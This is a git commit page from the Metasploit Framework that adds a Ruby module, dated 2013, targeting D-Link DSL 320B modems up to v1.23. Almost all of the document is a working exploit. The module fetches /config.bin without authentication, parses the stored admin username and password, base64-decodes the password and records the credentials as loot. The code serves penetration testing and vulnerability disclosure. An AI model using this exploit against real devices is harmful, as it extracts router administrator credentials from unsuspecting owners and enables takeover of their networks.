Merge branch 'master' of https://github.com/rapid7/metasploit-framework

2013-05-12 17:39:58 -05:00 · 2013-05-12 17:39:58 -05:00 · 51a532e8b4
parent 01ce751c51 feac292d85
commit 51a532e8b4
1 changed files with 92 additions and 0 deletions
--- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
@ -0,0 +1,92 @@
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # web site for more information on licensing and terms of use.
 #   http://metasploit.com/
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Auxiliary::Report
 	def initialize
 		super(
 			'Name'        => 'DLink DSL 320B Password Extractor',
 			'Description' => %q{
 					This module exploits an authentication bypass vulnerability in DLink DSL 320B
 				<=v1.23. This vulnerability allows to extract the credentials for the remote
 				management interface.
 			},
 			'References'  =>
 				[
 					[ 'EDB', '25252' ],
 					[ 'OSVDB', '93013' ],
 					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ],
 					[ 'URL', 'http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem' ],
 				],
 			'Author'      => [
 				'Michael Messner <devnull@s3cur1ty.de>',
 			],
 			'License'     => MSF_LICENSE
 		)
 	end
 	def run
 		vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")
 		#download configuration
 		begin
 			res = send_request_cgi({
 				'uri' => '/config.bin',
 				'method' => 'GET'
 			})
 			return if res.nil?
 			return if (res.headers['Server'].nil? or res.headers['Server'] !~ /micro_httpd/)
 			return if (res.code == 404)
 			if res.body =~ /sysPassword value/ or res.body =~ /sysUserName value/
 				if res.body !~ /sysPassword value/
 					print_status("#{rhost}:#{rport} - Default Configuration of DSL 320B detected - no password section available, try admin/admin")
 				else
 					print_good("#{rhost}:#{rport} - Credentials successfully extracted")
 				end
 				#store all details as loot -> there is some usefull stuff in the response
 				loot = store_loot("dlink.dsl320b.config","text/plain", rhost, res.body)
 				print_good("#{rhost}:#{rport} - Configuration of DSL 320B downloaded to: #{loot}")
 				user = ""
 				pass = ""
 				res.body.each_line do |line|
 					if line =~ /\<sysUserName\ value\=\"(.*)\"\/\>/
 						user = $1
 						next
 					end
 					if line =~ /\<sysPassword\ value\=\"(.*)\"\/\>/
 						pass = $1
 						pass = Rex::Text.decode_base64(pass)
 						print_good("#{rhost}:#{rport} - Credentials found: #{user} / #{pass}")
 						report_auth_info(
 							:host => rhost,
 							:port => rport,
 							:sname => 'http',
 							:user => user,
 							:pass => pass,
 							:active => true
 						)
 					end
 				end
 			end
 		rescue ::Rex::ConnectionError
 			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
 			return
 		end
 	end
 end